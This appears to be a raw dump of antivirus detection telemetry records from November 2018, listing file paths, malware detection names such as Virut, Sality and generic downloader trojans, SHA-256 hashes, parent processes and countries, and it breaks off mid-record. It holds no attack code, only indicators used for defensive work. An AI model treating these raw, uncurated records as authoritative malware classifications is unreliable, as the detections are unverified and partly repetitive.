  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T15:51:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T17:19:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fixattrb.exe', filepath='E:\\UBKT\\FixAttrb.exe', filesize=392000, name='W32/Sality.AT.#M1.#R1'), hash='1fc4b3b4bd83a166b9679841dcb68c6535040d77bc75d5e5f32bd6bf65ce754f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T01:07:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='1ff6b3658dc4353f8c87742731115fe6b3d46d344173043f038c1502c49d6f3a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ssopen.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Samsung\\Samsung CLX-6260 Series\\Setup\\Setup\\bin\\SSOpen.exe', filesize=72000, name='TR/Trash.Gen.#M1.#R1'), hash='203be6e7901a91e052b8b3827d2758d3b79d53d7eee101fd7846d4c2ea0b191d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='العاب فلاش.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\العاب فلاش\\العاب فلاش.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='204b278f762ef8d4d63924e537de775d52198026aebcac9ae718c7f1fa005c6c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\204E36F43707C248631F69DF0EF15098FE5BF80B8282E386DB458B4876B96F3B', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:32:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-7\\204E36F43707C248631F69DF0EF15098FE5BF80B8282E386DB458B4876B96F3B', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:22:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-7.categorizing\\204E36F43707C248631F69DF0EF15098FE5BF80B8282E386DB458B4876B96F3B', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='204e36f43707c248631f69df0ef15098fe5bf80b8282e386db458b4876b96f3b', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T13:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='windows 10 activator (updated).exe', filepath='G:\\WINDOWS 10 ACTIVATOR (UPDATED).EXE', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:51:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085221-84c782e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72c1806\\AVSCAN-20181102-085205-81730C3A\\AVSCAN-20181102-085221-84C782E0', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085846-d32c1bc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72c1806\\AVSCAN-20181102-085834-D0C07797\\AVSCAN-20181102-085846-D32C1BC2', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085646-bab46765', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72c1806\\AVSCAN-20181102-085634-B82D4EC1\\AVSCAN-20181102-085646-BAB46765', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085303-8d43742d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72c1806\\AVSCAN-20181102-085251-8ACC12B8\\AVSCAN-20181102-085303-8D43742D', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dark_tommy.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\Dark_Tommy\\Dark_Tommy.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soldier_frombondfilms.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\soldier_frombondfilms\\soldier_frombondfilms.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hulk.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\HULK\\HULK.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gign.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\GIGN\\GIGN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='supra fast and furious.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\supra_fast_and_furious\\SUPRA FAST AND FURIOUS\\SUPRA FAST AND FURIOUS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='program.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\PROGRAM\\PROGRAM.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vctxd.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\PROGRAM\\VCTXD\\VCTXD.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta-universv1.0.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\gta-universv1.0\\gta-universv1.0.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='matrix.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\MATRIX\\MATRIX.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='supra_fast_and_furious.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\supra_fast_and_furious\\supra_fast_and_furious.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gta3_vicecityv11megatrainer-trsi.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\GTA3_ViceCityv11Megatrainer-TRSI\\GTA3_ViceCityv11Megatrainer-TRSI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terminator.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\terminator\\terminator.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pizzadox.release.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\MISC\\pizzadox.release\\pizzadox.release.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='drz-vc6t.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\DRZ-VC6T\\DRZ-VC6T.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new folder.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new folder (2).exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\New Folder (2).exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='misc.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtaquickkeyipe\\MISC\\MISC.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', 